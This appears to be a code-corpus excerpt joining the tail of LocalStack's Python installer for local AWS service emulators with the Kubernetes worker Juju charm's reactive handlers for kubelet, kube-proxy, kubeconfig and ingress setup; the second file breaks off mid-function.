rm_rf(module_dir)
# disable x-pack-ml plugin (not working on Alpine)
xpack_dir = os.path.join(install_dir, "modules", "x-pack-ml", "platform")
rm_rf(xpack_dir)
# patch JVM options file - replace hardcoded heap size settings
jvm_options_file = os.path.join(install_dir, "config", "jvm.options")
if os.path.exists(jvm_options_file):
jvm_options = load_file(jvm_options_file)
jvm_options_replaced = re.sub(
r"(^-Xm[sx][a-zA-Z0-9\.]+$)", r"# \1", jvm_options, flags=re.MULTILINE
)
if jvm_options != jvm_options_replaced:
save_file(jvm_options_file, jvm_options_replaced)
def install_elasticmq():
if SQS_BACKEND_IMPL != "elasticmq":
return
# TODO remove this function if we stop using ElasticMQ entirely
if not os.path.exists(INSTALL_PATH_ELASTICMQ_JAR):
log_install_msg("ElasticMQ")
mkdir(INSTALL_DIR_ELASTICMQ)
# download archive
tmp_archive = os.path.join(config.TMP_FOLDER, "elasticmq-server.jar")
if not os.path.exists(tmp_archive):
download(ELASTICMQ_JAR_URL, tmp_archive)
shutil.copy(tmp_archive, INSTALL_DIR_ELASTICMQ)
def install_kinesis():
if KINESIS_PROVIDER == "kinesalite":
return install_kinesalite()
elif KINESIS_PROVIDER == "kinesis-mock":
return install_kinesis_mock()
else:
raise ValueError("unknown kinesis provider %s" % KINESIS_PROVIDER)
def install_kinesalite():
if not os.path.exists(INSTALL_PATH_KINESALITE_CLI):
log_install_msg("Kinesis")
run('cd "%s" && npm install' % MODULE_MAIN_PATH)
def install_kinesis_mock():
target_dir = INSTALL_PATH_KINESIS_MOCK
machine = platform.machine().lower()
system = platform.system().lower()
version = platform.version().lower()
is_probably_m1 = system == "darwin" and ("arm64" in version or "arm32" in version)
LOG.debug("getting kinesis-mock for %s %s", system, machine)
if (machine == "x86_64" or machine == "amd64") and not is_probably_m1:
if system == "windows":
bin_file = "kinesis-mock-mostly-static.exe"
elif system == "linux":
bin_file = "kinesis-mock-linux-amd64-static"
elif system == "darwin":
bin_file = "kinesis-mock-macos-amd64-dynamic"
else:
bin_file = "kinesis-mock.jar"
else:
bin_file = "kinesis-mock.jar"
bin_file_path = os.path.join(target_dir, bin_file)
if os.path.exists(bin_file_path):
LOG.debug("kinesis-mock found at %s", bin_file_path)
return bin_file_path
response = requests.get(KINESIS_MOCK_RELEASE_URL)
if not response.ok:
raise ValueError(
"Could not get list of releases from %s: %s" % (KINESIS_MOCK_RELEASE_URL, response.text)
)
github_release = response.json()
download_url = None
for asset in github_release.get("assets", []):
# find the correct binary in the release
if asset["name"] == bin_file:
download_url = asset["browser_download_url"]
break
if download_url is None:
raise ValueError(
"could not find required binary %s in release %s" % (bin_file, KINESIS_MOCK_RELEASE_URL)
)
mkdir(target_dir)
LOG.info("downloading kinesis-mock binary from %s", download_url)
download(download_url, bin_file_path)
chmod_r(bin_file_path, 0o777)
return bin_file_path
def install_local_kms():
local_arch = get_arch()
binary_path = INSTALL_PATH_KMS_BINARY_PATTERN.replace("<arch>", local_arch)
if not os.path.exists(binary_path):
log_install_msg("KMS")
mkdir(INSTALL_DIR_KMS)
kms_url = KMS_URL_PATTERN.replace("<arch>", local_arch)
download(kms_url, binary_path)
chmod_r(binary_path, 0o777)
def install_stepfunctions_local():
if not os.path.exists(INSTALL_PATH_STEPFUNCTIONS_JAR):
# pull the JAR file from the Docker image, which is more up-to-date than the downloadable JAR file
log_install_msg("Step Functions")
mkdir(INSTALL_DIR_STEPFUNCTIONS)
run("{dc} pull {img}".format(dc=config.DOCKER_CMD, img=IMAGE_NAME_SFN_LOCAL))
docker_name = "tmp-ls-sfn"
run(
("{dc} run --name={dn} --entrypoint= -d --rm {img} sleep 15").format(
dc=config.DOCKER_CMD, dn=docker_name, img=IMAGE_NAME_SFN_LOCAL
)
)
time.sleep(5)
run(
"{dc} cp {dn}:/home/stepfunctionslocal/ {tgt}".format(
dc=config.DOCKER_CMD, dn=docker_name, tgt=INSTALL_DIR_INFRA
)
)
run("mv %s/stepfunctionslocal/*.jar %s" % (INSTALL_DIR_INFRA, INSTALL_DIR_STEPFUNCTIONS))
rm_rf("%s/stepfunctionslocal" % INSTALL_DIR_INFRA)
# apply patches
patch_class_file = os.path.join(INSTALL_DIR_STEPFUNCTIONS, SFN_PATCH_CLASS)
if not os.path.exists(patch_class_file):
download(SFN_PATCH_CLASS_URL, patch_class_file)
cmd = 'cd "%s"; zip %s %s' % (
INSTALL_DIR_STEPFUNCTIONS,
INSTALL_PATH_STEPFUNCTIONS_JAR,
SFN_PATCH_CLASS,
)
run(cmd)
def install_dynamodb_local():
if OVERWRITE_DDB_FILES_IN_DOCKER and in_docker():
rm_rf(INSTALL_DIR_DDB)
is_in_alpine = is_alpine()
if not os.path.exists(INSTALL_PATH_DDB_JAR):
log_install_msg("DynamoDB")
# download and extract archive
tmp_archive = os.path.join(tempfile.gettempdir(), "localstack.ddb.zip")
dynamodb_url = DYNAMODB_JAR_URL_ALPINE if is_in_alpine else DYNAMODB_JAR_URL
download_and_extract_with_retry(dynamodb_url, tmp_archive, INSTALL_DIR_DDB)
# fix logging configuration for DynamoDBLocal
log4j2_config = """<Configuration status="WARN">
<Appenders>
<Console name="Console" target="SYSTEM_OUT">
<PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
</Console>
</Appenders>
<Loggers>
<Root level="WARN"><AppenderRef ref="Console"/></Root>
</Loggers>
</Configuration>"""
log4j2_file = os.path.join(INSTALL_DIR_DDB, "log4j2.xml")
save_file(log4j2_file, log4j2_config)
run('cd "%s" && zip -u DynamoDBLocal.jar log4j2.xml || true' % INSTALL_DIR_DDB)
def install_amazon_kinesis_client_libs():
# install KCL/STS JAR files
if not os.path.exists(INSTALL_PATH_KCL_JAR):
mkdir(INSTALL_DIR_KCL)
tmp_archive = os.path.join(tempfile.gettempdir(), "aws-java-sdk-sts.jar")
if not os.path.exists(tmp_archive):
download(STS_JAR_URL, tmp_archive)
shutil.copy(tmp_archive, INSTALL_DIR_KCL)
# Compile Java files
from localstack.utils.kinesis import kclipy_helper
classpath = kclipy_helper.get_kcl_classpath()
if is_windows():
classpath = re.sub(r":([^\\])", r";\1", classpath)
java_files = "%s/utils/kinesis/java/cloud/localstack/*.java" % MODULE_MAIN_PATH
class_files = "%s/utils/kinesis/java/cloud/localstack/*.class" % MODULE_MAIN_PATH
if not glob.glob(class_files):
run(
'javac -source %s -target %s -cp "%s" %s'
% (JAVAC_TARGET_VERSION, JAVAC_TARGET_VERSION, classpath, java_files)
)
def install_lambda_java_libs():
# install LocalStack "fat" JAR file (contains all dependencies)
if not os.path.exists(INSTALL_PATH_LOCALSTACK_FAT_JAR):
log_install_msg("LocalStack Java libraries", verbatim=True)
download(URL_LOCALSTACK_FAT_JAR, INSTALL_PATH_LOCALSTACK_FAT_JAR)
def install_cloudformation_libs():
from localstack.services.cloudformation import deployment_utils
# trigger download of CF module file
deployment_utils.get_cfn_response_mod_file()
def install_component(name):
installers = {
"cloudformation": install_cloudformation_libs,
"dynamodb": install_dynamodb_local,
"kinesis": install_kinesis,
"kms": install_local_kms,
"sqs": install_elasticmq,
"stepfunctions": install_stepfunctions_local,
}
installer = installers.get(name)
if installer:
installer()
def install_components(names):
parallelize(install_component, names)
install_lambda_java_libs()
def install_all_components():
# load plugins
os.environ[LOCALSTACK_INFRA_PROCESS] = "1"
bootstrap.load_plugins()
# install all components
install_components(DEFAULT_SERVICE_PORTS.keys())
def install_debugpy_and_dependencies():
try:
import debugpy
assert debugpy
logging.debug("Debugpy module already Installed")
except ModuleNotFoundError:
logging.debug("Installing Debugpy module")
import pip
if hasattr(pip, "main"):
pip.main(["install", DEBUGPY_MODULE])
else:
pip._internal.main(["install", DEBUGPY_MODULE])
# -----------------
# HELPER FUNCTIONS
# -----------------
def log_install_msg(component, verbatim=False):
component = component if verbatim else "local %s server" % component
LOG.info("Downloading and installing %s. This may take some time." % component)
def download_and_extract(archive_url, target_dir, retries=0, sleep=3, tmp_archive=None):
mkdir(target_dir)
tmp_archive = tmp_archive or new_tmp_file()
if not os.path.exists(tmp_archive):
# create temporary placeholder file, to avoid duplicate parallel downloads
save_file(tmp_archive, "")
for i in range(retries + 1):
try:
download(archive_url, tmp_archive)
break
except Exception:
time.sleep(sleep)
_, ext = os.path.splitext(tmp_archive)
if ext == ".zip":
unzip(tmp_archive, target_dir)
elif ext == ".gz" or ext == ".bz2":
untar(tmp_archive, target_dir)
else:
raise Exception("Unsupported archive format: %s" % ext)
def download_and_extract_with_retry(archive_url, tmp_archive, target_dir):
try:
download_and_extract(archive_url, target_dir, tmp_archive=tmp_archive)
except Exception as e:
# try deleting and re-downloading the zip file
LOG.info("Unable to extract file, re-downloading ZIP archive %s: %s" % (tmp_archive, e))
rm_rf(tmp_archive)
download_and_extract(archive_url, target_dir, tmp_archive=tmp_archive)
def main():
if len(sys.argv) > 1:
os.environ["LOCALSTACK_API_KEY"] = os.environ.get("LOCALSTACK_API_KEY") or "test"
if sys.argv[1] == "libs":
print("Initializing installation.")
logging.basicConfig(level=logging.INFO)
logging.getLogger("requests").setLevel(logging.WARNING)
install_all_components()
if sys.argv[1] in ("libs", "testlibs"):
# Install additional libraries for testing
install_amazon_kinesis_client_libs()
print("Done.")
if __name__ == "__main__":
main()
|
py | 1a4fa1641dd5c5ecae55dd0c11a1951e288907a7 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import random
import shutil
import subprocess
import time
from shlex import split
from subprocess import check_call, check_output
from subprocess import CalledProcessError
from socket import gethostname
from charms import layer
from charms.layer import snap
from charms.reactive import hook
from charms.reactive import set_state, remove_state, is_state
from charms.reactive import when, when_any, when_not
from charms.kubernetes.common import get_version
from charms.reactive.helpers import data_changed, any_file_changed
from charms.templating.jinja2 import render
from charmhelpers.core import hookenv, unitdata
from charmhelpers.core.host import service_stop, service_restart
from charmhelpers.contrib.charmsupport import nrpe
# Override the default nagios shortname regex to allow periods, which we
# need because our bin names contain them (e.g. 'snap.foo.daemon'). The
# default regex in charmhelpers doesn't allow periods, but nagios itself does.
nrpe.Check.shortname_re = '[\.A-Za-z0-9-_]+$'
kubeconfig_path = '/root/cdk/kubeconfig'
kubeproxyconfig_path = '/root/cdk/kubeproxyconfig'
kubeclientconfig_path = '/root/.kube/config'
os.environ['PATH'] += os.pathsep + os.path.join(os.sep, 'snap', 'bin')
db = unitdata.kv()
@hook('upgrade-charm')
def upgrade_charm():
# Trigger removal of PPA docker installation if it was previously set.
set_state('config.changed.install_from_upstream')
hookenv.atexit(remove_state, 'config.changed.install_from_upstream')
cleanup_pre_snap_services()
check_resources_for_upgrade_needed()
# Remove the RC for nginx ingress if it exists
if hookenv.config().get('ingress'):
kubectl_success('delete', 'rc', 'nginx-ingress-controller')
# Remove gpu.enabled state so we can reconfigure gpu-related kubelet flags,
# since they can differ between k8s versions
remove_state('kubernetes-worker.gpu.enabled')
remove_state('kubernetes-worker.cni-plugins.installed')
remove_state('kubernetes-worker.config.created')
remove_state('kubernetes-worker.ingress.available')
set_state('kubernetes-worker.restart-needed')
def check_resources_for_upgrade_needed():
hookenv.status_set('maintenance', 'Checking resources')
resources = ['kubectl', 'kubelet', 'kube-proxy']
paths = [hookenv.resource_get(resource) for resource in resources]
if any_file_changed(paths):
set_upgrade_needed()
def set_upgrade_needed():
set_state('kubernetes-worker.snaps.upgrade-needed')
config = hookenv.config()
previous_channel = config.previous('channel')
require_manual = config.get('require-manual-upgrade')
if previous_channel is None or not require_manual:
set_state('kubernetes-worker.snaps.upgrade-specified')
def cleanup_pre_snap_services():
# remove old states
remove_state('kubernetes-worker.components.installed')
# disable old services
services = ['kubelet', 'kube-proxy']
for service in services:
hookenv.log('Stopping {0} service.'.format(service))
service_stop(service)
# cleanup old files
files = [
"/lib/systemd/system/kubelet.service",
"/lib/systemd/system/kube-proxy.service",
"/etc/default/kube-default",
"/etc/default/kubelet",
"/etc/default/kube-proxy",
"/srv/kubernetes",
"/usr/local/bin/kubectl",
"/usr/local/bin/kubelet",
"/usr/local/bin/kube-proxy",
"/etc/kubernetes"
]
for file in files:
if os.path.isdir(file):
hookenv.log("Removing directory: " + file)
shutil.rmtree(file)
elif os.path.isfile(file):
hookenv.log("Removing file: " + file)
os.remove(file)
@when('config.changed.channel')
def channel_changed():
set_upgrade_needed()
@when('kubernetes-worker.snaps.upgrade-needed')
@when_not('kubernetes-worker.snaps.upgrade-specified')
def upgrade_needed_status():
msg = 'Needs manual upgrade, run the upgrade action'
hookenv.status_set('blocked', msg)
@when('kubernetes-worker.snaps.upgrade-specified')
def install_snaps():
check_resources_for_upgrade_needed()
channel = hookenv.config('channel')
hookenv.status_set('maintenance', 'Installing kubectl snap')
snap.install('kubectl', channel=channel, classic=True)
hookenv.status_set('maintenance', 'Installing kubelet snap')
snap.install('kubelet', channel=channel, classic=True)
hookenv.status_set('maintenance', 'Installing kube-proxy snap')
snap.install('kube-proxy', channel=channel, classic=True)
set_state('kubernetes-worker.snaps.installed')
set_state('kubernetes-worker.restart-needed')
remove_state('kubernetes-worker.snaps.upgrade-needed')
remove_state('kubernetes-worker.snaps.upgrade-specified')
@hook('stop')
def shutdown():
''' When this unit is destroyed:
- delete the current node
- stop the worker services
'''
try:
if os.path.isfile(kubeconfig_path):
kubectl('delete', 'node', gethostname().lower())
except CalledProcessError:
hookenv.log('Failed to unregister node.')
service_stop('snap.kubelet.daemon')
service_stop('snap.kube-proxy.daemon')
@when('docker.available')
@when_not('kubernetes-worker.cni-plugins.installed')
def install_cni_plugins():
''' Unpack the cni-plugins resource '''
charm_dir = os.getenv('CHARM_DIR')
# Get the resource via resource_get
try:
resource_name = 'cni-{}'.format(arch())
archive = hookenv.resource_get(resource_name)
except Exception:
message = 'Error fetching the cni resource.'
hookenv.log(message)
hookenv.status_set('blocked', message)
return
if not archive:
hookenv.log('Missing cni resource.')
hookenv.status_set('blocked', 'Missing cni resource.')
return
# Handle null resource publication, we check if filesize < 1mb
filesize = os.stat(archive).st_size
if filesize < 1000000:
hookenv.status_set('blocked', 'Incomplete cni resource.')
return
hookenv.status_set('maintenance', 'Unpacking cni resource.')
unpack_path = '{}/files/cni'.format(charm_dir)
os.makedirs(unpack_path, exist_ok=True)
cmd = ['tar', 'xfvz', archive, '-C', unpack_path]
hookenv.log(cmd)
check_call(cmd)
apps = [
{'name': 'loopback', 'path': '/opt/cni/bin'}
]
for app in apps:
unpacked = '{}/{}'.format(unpack_path, app['name'])
app_path = os.path.join(app['path'], app['name'])
install = ['install', '-v', '-D', unpacked, app_path]
hookenv.log(install)
check_call(install)
# Used by the "registry" action. The action is run on a single worker, but
# the registry pod can end up on any worker, so we need this directory on
# all the workers.
os.makedirs('/srv/registry', exist_ok=True)
set_state('kubernetes-worker.cni-plugins.installed')
@when('kubernetes-worker.snaps.installed')
def set_app_version():
''' Declare the application version to juju '''
cmd = ['kubelet', '--version']
version = check_output(cmd)
hookenv.application_version_set(version.split(b' v')[-1].rstrip())
@when('kubernetes-worker.snaps.installed')
@when_not('kube-control.dns.available')
def notify_user_transient_status():
''' Notify to the user we are in a transient state and the application
is still converging. Potentially remotely, or we may be in a detached loop
wait state '''
# During deployment the worker has to start kubelet without cluster dns
# configured. If this is the first unit online in a service pool waiting
# to self host the dns pod, and configure itself to query the dns service
# declared in the kube-system namespace
hookenv.status_set('waiting', 'Waiting for cluster DNS.')
@when('kubernetes-worker.snaps.installed',
'kube-control.dns.available')
@when_not('kubernetes-worker.snaps.upgrade-needed')
def charm_status(kube_control):
'''Update the status message with the current status of kubelet.'''
update_kubelet_status()
def update_kubelet_status():
''' There are different states that the kubelet can be in, where we are
waiting for dns, waiting for cluster turnup, or ready to serve
applications.'''
services = [
'kubelet',
'kube-proxy'
]
failing_services = []
for service in services:
daemon = 'snap.{}.daemon'.format(service)
if not _systemctl_is_active(daemon):
failing_services.append(service)
if len(failing_services) == 0:
hookenv.status_set('active', 'Kubernetes worker running.')
else:
msg = 'Waiting for {} to start.'.format(','.join(failing_services))
hookenv.status_set('waiting', msg)
def get_ingress_address(relation):
try:
network_info = hookenv.network_get(relation.relation_name)
except NotImplementedError:
network_info = []
if network_info and 'ingress-addresses' in network_info:
# just grab the first one for now, maybe be more robust here?
return network_info['ingress-addresses'][0]
else:
# if they don't have ingress-addresses they are running a juju that
# doesn't support spaces, so just return the private address
return hookenv.unit_get('private-address')
@when('certificates.available', 'kube-control.connected')
def send_data(tls, kube_control):
'''Send the data that is required to create a server certificate for
this server.'''
# Use the public ip of this unit as the Common Name for the certificate.
common_name = hookenv.unit_public_ip()
ingress_ip = get_ingress_address(kube_control)
# Create SANs that the tls layer will add to the server cert.
sans = [
hookenv.unit_public_ip(),
ingress_ip,
gethostname()
]
# Create a path safe name by removing path characters from the unit name.
certificate_name = hookenv.local_unit().replace('/', '_')
# Request a server cert with this information.
tls.request_server_cert(common_name, sans, certificate_name)
@when('kube-api-endpoint.available', 'kube-control.dns.available',
'cni.available')
def watch_for_changes(kube_api, kube_control, cni):
''' Watch for configuration changes and signal if we need to restart the
worker services '''
servers = get_kube_api_servers(kube_api)
dns = kube_control.get_dns()
cluster_cidr = cni.get_config()['cidr']
if (data_changed('kube-api-servers', servers) or
data_changed('kube-dns', dns) or
data_changed('cluster-cidr', cluster_cidr)):
set_state('kubernetes-worker.restart-needed')
@when('kubernetes-worker.snaps.installed', 'kube-api-endpoint.available',
'tls_client.ca.saved', 'tls_client.client.certificate.saved',
'tls_client.client.key.saved', 'tls_client.server.certificate.saved',
'tls_client.server.key.saved',
'kube-control.dns.available', 'kube-control.auth.available',
'cni.available', 'kubernetes-worker.restart-needed',
'worker.auth.bootstrapped')
def start_worker(kube_api, kube_control, auth_control, cni):
''' Start kubelet using the provided API and DNS info.'''
servers = get_kube_api_servers(kube_api)
# Note that the DNS server doesn't necessarily exist at this point. We know
# what its IP will eventually be, though, so we can go ahead and configure
# kubelet with that info. This ensures that early pods are configured with
# the correct DNS even though the server isn't ready yet.
dns = kube_control.get_dns()
ingress_ip = get_ingress_address(kube_control)
cluster_cidr = cni.get_config()['cidr']
if cluster_cidr is None:
hookenv.log('Waiting for cluster cidr.')
return
creds = db.get('credentials')
data_changed('kube-control.creds', creds)
# set --allow-privileged flag for kubelet
set_privileged()
create_config(random.choice(servers), creds)
configure_kubelet(dns, ingress_ip)
configure_kube_proxy(servers, cluster_cidr)
set_state('kubernetes-worker.config.created')
restart_unit_services()
update_kubelet_status()
apply_node_labels()
remove_state('kubernetes-worker.restart-needed')
@when('cni.connected')
@when_not('cni.configured')
def configure_cni(cni):
''' Set worker configuration on the CNI relation. This lets the CNI
subordinate know that we're the worker so it can respond accordingly. '''
cni.set_config(is_master=False, kubeconfig_path=kubeconfig_path)
@when('config.changed.ingress')
def toggle_ingress_state():
''' Ingress is a toggled state. Remove ingress.available if set when
toggled '''
remove_state('kubernetes-worker.ingress.available')
@when('docker.sdn.configured')
def sdn_changed():
'''The Software Defined Network changed on the container so restart the
kubernetes services.'''
restart_unit_services()
update_kubelet_status()
remove_state('docker.sdn.configured')
@when('kubernetes-worker.config.created')
@when_not('kubernetes-worker.ingress.available')
def render_and_launch_ingress():
''' If configuration has ingress daemon set enabled, launch the ingress load
balancer and default http backend. Otherwise attempt deletion. '''
config = hookenv.config()
# If ingress is enabled, launch the ingress controller
if config.get('ingress'):
launch_default_ingress_controller()
else:
hookenv.log('Deleting the http backend and ingress.')
kubectl_manifest('delete',
'/root/cdk/addons/default-http-backend.yaml')
kubectl_manifest('delete',
'/root/cdk/addons/ingress-daemon-set.yaml') # noqa
hookenv.close_port(80)
hookenv.close_port(443)
@when('config.changed.labels', 'kubernetes-worker.config.created')
def apply_node_labels():
''' Parse the labels configuration option and apply the labels to the node.
'''
# scrub and try to format an array from the configuration option
config = hookenv.config()
user_labels = _parse_labels(config.get('labels'))
# For diffing sake, iterate the previous label set
if config.previous('labels'):
previous_labels = _parse_labels(config.previous('labels'))
hookenv.log('previous labels: {}'.format(previous_labels))
else:
# this handles first time run if there is no previous labels config
previous_labels = _parse_labels("")
# Calculate label removal
for label in previous_labels:
if label not in user_labels:
hookenv.log('Deleting node label {}'.format(label))
_apply_node_label(label, delete=True)
# if the label is in user labels we do nothing here, it will get set
# during the atomic update below.
# Atomically set a label
for label in user_labels:
_apply_node_label(label, overwrite=True)
# Set label for application name
_apply_node_label('juju-application={}'.format(hookenv.service_name()),
overwrite=True)
@when_any('config.changed.kubelet-extra-args',
'config.changed.proxy-extra-args')
def extra_args_changed():
set_state('kubernetes-worker.restart-needed')
@when('config.changed.docker-logins')
def docker_logins_changed():
config = hookenv.config()
previous_logins = config.previous('docker-logins')
logins = config['docker-logins']
logins = json.loads(logins)
if previous_logins:
previous_logins = json.loads(previous_logins)
next_servers = {login['server'] for login in logins}
previous_servers = {login['server'] for login in previous_logins}
servers_to_logout = previous_servers - next_servers
for server in servers_to_logout:
cmd = ['docker', 'logout', server]
subprocess.check_call(cmd)
for login in logins:
server = login['server']
username = login['username']
password = login['password']
cmd = ['docker', 'login', server, '-u', username, '-p', password]
subprocess.check_call(cmd)
set_state('kubernetes-worker.restart-needed')
def arch():
'''Return the package architecture as a string. Raise an exception if the
architecture is not supported by kubernetes.'''
# Get the package architecture for this system.
architecture = check_output(['dpkg', '--print-architecture']).rstrip()
# Convert the binary result into a string.
architecture = architecture.decode('utf-8')
return architecture
def create_config(server, creds):
'''Create a kubernetes configuration for the worker unit.'''
# Get the options from the tls-client layer.
layer_options = layer.options('tls-client')
# Get all the paths to the tls information required for kubeconfig.
ca = layer_options.get('ca_certificate_path')
# Create kubernetes configuration in the default location for ubuntu.
create_kubeconfig('/home/ubuntu/.kube/config', server, ca,
token=creds['client_token'], user='ubuntu')
# Make the config dir readable by the ubuntu users so juju scp works.
cmd = ['chown', '-R', 'ubuntu:ubuntu', '/home/ubuntu/.kube']
check_call(cmd)
# Create kubernetes configuration in the default location for root.
create_kubeconfig(kubeclientconfig_path, server, ca,
token=creds['client_token'], user='root')
# Create kubernetes configuration for kubelet, and kube-proxy services.
create_kubeconfig(kubeconfig_path, server, ca,
token=creds['kubelet_token'], user='kubelet')
create_kubeconfig(kubeproxyconfig_path, server, ca,
token=creds['proxy_token'], user='kube-proxy')
def parse_extra_args(config_key):
elements = hookenv.config().get(config_key, '').split()
args = {}
for element in elements:
if '=' in element:
key, _, value = element.partition('=')
args[key] = value
else:
args[element] = 'true'
return args
def configure_kubernetes_service(service, base_args, extra_args_key):
db = unitdata.kv()
prev_args_key = 'kubernetes-worker.prev_args.' + service
prev_args = db.get(prev_args_key) or {}
extra_args = parse_extra_args(extra_args_key)
args = {}
for arg in prev_args:
# remove previous args by setting to null
args[arg] = 'null'
for k, v in base_args.items():
args[k] = v
for k, v in extra_args.items():
args[k] = v
cmd = ['snap', 'set', service] + ['%s=%s' % item for item in args.items()]
check_call(cmd)
db.set(prev_args_key, args)
def configure_kubelet(dns, ingress_ip):
layer_options = layer.options('tls-client')
ca_cert_path = layer_options.get('ca_certificate_path')
server_cert_path = layer_options.get('server_certificate_path')
server_key_path = layer_options.get('server_key_path')
kubelet_opts = {}
kubelet_opts['require-kubeconfig'] = 'true'
kubelet_opts['kubeconfig'] = kubeconfig_path
kubelet_opts['network-plugin'] = 'cni'
kubelet_opts['v'] = '0'
kubelet_opts['address'] = '0.0.0.0'
kubelet_opts['port'] = '10250'
kubelet_opts['cluster-domain'] = dns['domain']
kubelet_opts['anonymous-auth'] = 'false'
kubelet_opts['client-ca-file'] = ca_cert_path
kubelet_opts['tls-cert-file'] = server_cert_path
kubelet_opts['tls-private-key-file'] = server_key_path
kubelet_opts['logtostderr'] = 'true'
kubelet_opts['fail-swap-on'] = 'false'
kubelet_opts['node-ip'] = ingress_ip
if (dns['enable-kube-dns']):
kubelet_opts['cluster-dns'] = dns['sdn-ip']
privileged = is_state('kubernetes-worker.privileged')
kubelet_opts['allow-privileged'] = 'true' if privileged else 'false'
if is_state('kubernetes-worker.gpu.enabled'):
if get_version('kubelet') < (1, 6):
hookenv.log('Adding --experimental-nvidia-gpus=1 to kubelet')
kubelet_opts['experimental-nvidia-gpus'] = '1'
else:
hookenv.log('Adding --feature-gates=Accelerators=true to kubelet')
kubelet_opts['feature-gates'] = 'Accelerators=true'
configure_kubernetes_service('kubelet', kubelet_opts, 'kubelet-extra-args')
def configure_kube_proxy(api_servers, cluster_cidr):
kube_proxy_opts = {}
kube_proxy_opts['cluster-cidr'] = cluster_cidr
kube_proxy_opts['kubeconfig'] = kubeproxyconfig_path
kube_proxy_opts['logtostderr'] = 'true'
kube_proxy_opts['v'] = '0'
kube_proxy_opts['master'] = random.choice(api_servers)
if b'lxc' in check_output('virt-what', shell=True):
kube_proxy_opts['conntrack-max-per-core'] = '0'
configure_kubernetes_service('kube-proxy', kube_proxy_opts,
'proxy-extra-args')
def create_kubeconfig(kubeconfig, server, ca, key=None, certificate=None,
user='ubuntu', context='juju-context',
cluster='juju-cluster', password=None, token=None):
'''Create a configuration for Kubernetes based on path using the supplied
arguments for values of the Kubernetes server, CA, key, certificate, user
context and cluster.'''
if not key and not certificate and not password and not token:
raise ValueError('Missing authentication mechanism.')
# token and password are mutually exclusive. Error early if both are
# present. The developer has requested an impossible situation.
# see: kubectl config set-credentials --help
if token and password:
raise ValueError('Token and Password are mutually exclusive.')
# Create the config file with the address of the master server.
cmd = 'kubectl config --kubeconfig={0} set-cluster {1} ' \
'--server={2} --certificate-authority={3} --embed-certs=true'
check_call(split(cmd.format(kubeconfig, cluster, server, ca)))
# Delete old users
cmd = 'kubectl config --kubeconfig={0} unset users'
check_call(split(cmd.format(kubeconfig)))
# Create the credentials using the client flags.
cmd = 'kubectl config --kubeconfig={0} ' \
'set-credentials {1} '.format(kubeconfig, user)
if key and certificate:
cmd = '{0} --client-key={1} --client-certificate={2} '\
'--embed-certs=true'.format(cmd, key, certificate)
if password:
cmd = "{0} --username={1} --password={2}".format(cmd, user, password)
# This is mutually exclusive from password. They will not work together.
if token:
cmd = "{0} --token={1}".format(cmd, token)
check_call(split(cmd))
# Create a default context with the cluster.
cmd = 'kubectl config --kubeconfig={0} set-context {1} ' \
'--cluster={2} --user={3}'
check_call(split(cmd.format(kubeconfig, context, cluster, user)))
# Make the config use this new context.
cmd = 'kubectl config --kubeconfig={0} use-context {1}'
check_call(split(cmd.format(kubeconfig, context)))
@when_any('config.changed.default-backend-image',
'config.changed.nginx-image')
@when('kubernetes-worker.config.created')
def launch_default_ingress_controller():
''' Launch the Kubernetes ingress controller & default backend (404) '''
config = hookenv.config()
# need to test this in case we get in
# here from a config change to the image
if not config.get('ingress'):
return
context = {}
context['arch'] = arch()
addon_path = '/root/cdk/addons/{}'
context['defaultbackend_image'] = config.get('default-backend-image')
if (context['defaultbackend_image'] == "" or
context['defaultbackend_image'] == "auto"):
if context['arch'] == 's390x':
context['defaultbackend_image'] = \
"gcr.io/google_containers/defaultbackend-s390x:1.4"
else:
context['defaultbackend_image'] = \
"gcr.io/google_containers/defaultbackend:1.4"
# Render the default http backend (404) replicationcontroller manifest
manifest = addon_path.format('default-http-backend.yaml')
render('default-http-backend.yaml', manifest, context)
hookenv.log('Creating the default http backend.')
try:
kubectl('apply', '-f', manifest)
except CalledProcessError as e:
hookenv.log(e)
hookenv.log('Failed to create default-http-backend. Will attempt again next update.') # noqa
hookenv.close_port(80)
hookenv.close_port(443)
return
# Render the ingress daemon set controller manifest
context['ingress_image'] = config.get('nginx-image')
if context['ingress_image'] == "" or context['ingress_image'] == "auto":
if context['arch'] == 's390x':
context['ingress_image'] = \
"docker.io/cdkbot/nginx-ingress-controller-s390x:0.9.0-beta.13"
else:
context['ingress_image'] = \
"gcr.io/google_containers/nginx-ingress-controller:0.9.0-beta.15" # noqa
context['juju_application'] = hookenv.service_name()
manifest = addon_path.format('ingress-daemon-set.yaml')
render('ingress-daemon-set.yaml', manifest, context)
hookenv.log('Creating the ingress daemon set.')
try:
kubectl('apply', '-f', manifest)
except CalledProcessError as e:
hookenv.log(e)
hookenv.log('Failed to create ingress controller. Will attempt again next update.') # noqa
hookenv.close_port(80)
hookenv.close_port(443)
return
set_state('kubernetes-worker.ingress.available')
hookenv.open_port(80)
hookenv.open_port(443)
def restart_unit_services():
'''Restart worker services.'''
hookenv.log('Restarting kubelet and kube-proxy.')
services = ['kube-proxy', 'kubelet']
for service in services:
service_restart('snap.%s.daemon' % service)
def get_kube_api_servers(kube_api):
'''Return the kubernetes api server address and port for this
relationship.'''
hosts = []
# Iterate over every service from the relation object.
for service in kube_api.services():
for unit in service['hosts']:
hosts.append('https://{0}:{1}'.format(unit['hostname'],
unit['port']))
return hosts
def kubectl(*args):
''' Run a kubectl cli command with a config file. Returns stdout and throws
an error if the command fails. '''
command = ['kubectl', '--kubeconfig=' + kubeclientconfig_path] + list(args)
hookenv.log('Executing {}'.format(command))
return check_output(command)
def kubectl_success(*args):
''' Runs kubectl with the given args. Returns True if succesful, False if
not. '''
try:
kubectl(*args)
return True
except CalledProcessError:
return False
def kubectl_manifest(operation, manifest):
''' Wrap the kubectl creation command when using filepath resources
:param operation - one of get, create, delete, replace
:param manifest - filepath to the manifest
'''
# Deletions are a special case
if operation == 'delete':
# Ensure we immediately remove requested resources with --now
return kubectl_success(operation, '-f', manifest, '--now')
else:
# Guard against an error re-creating the same manifest multiple times
if operation == 'create':
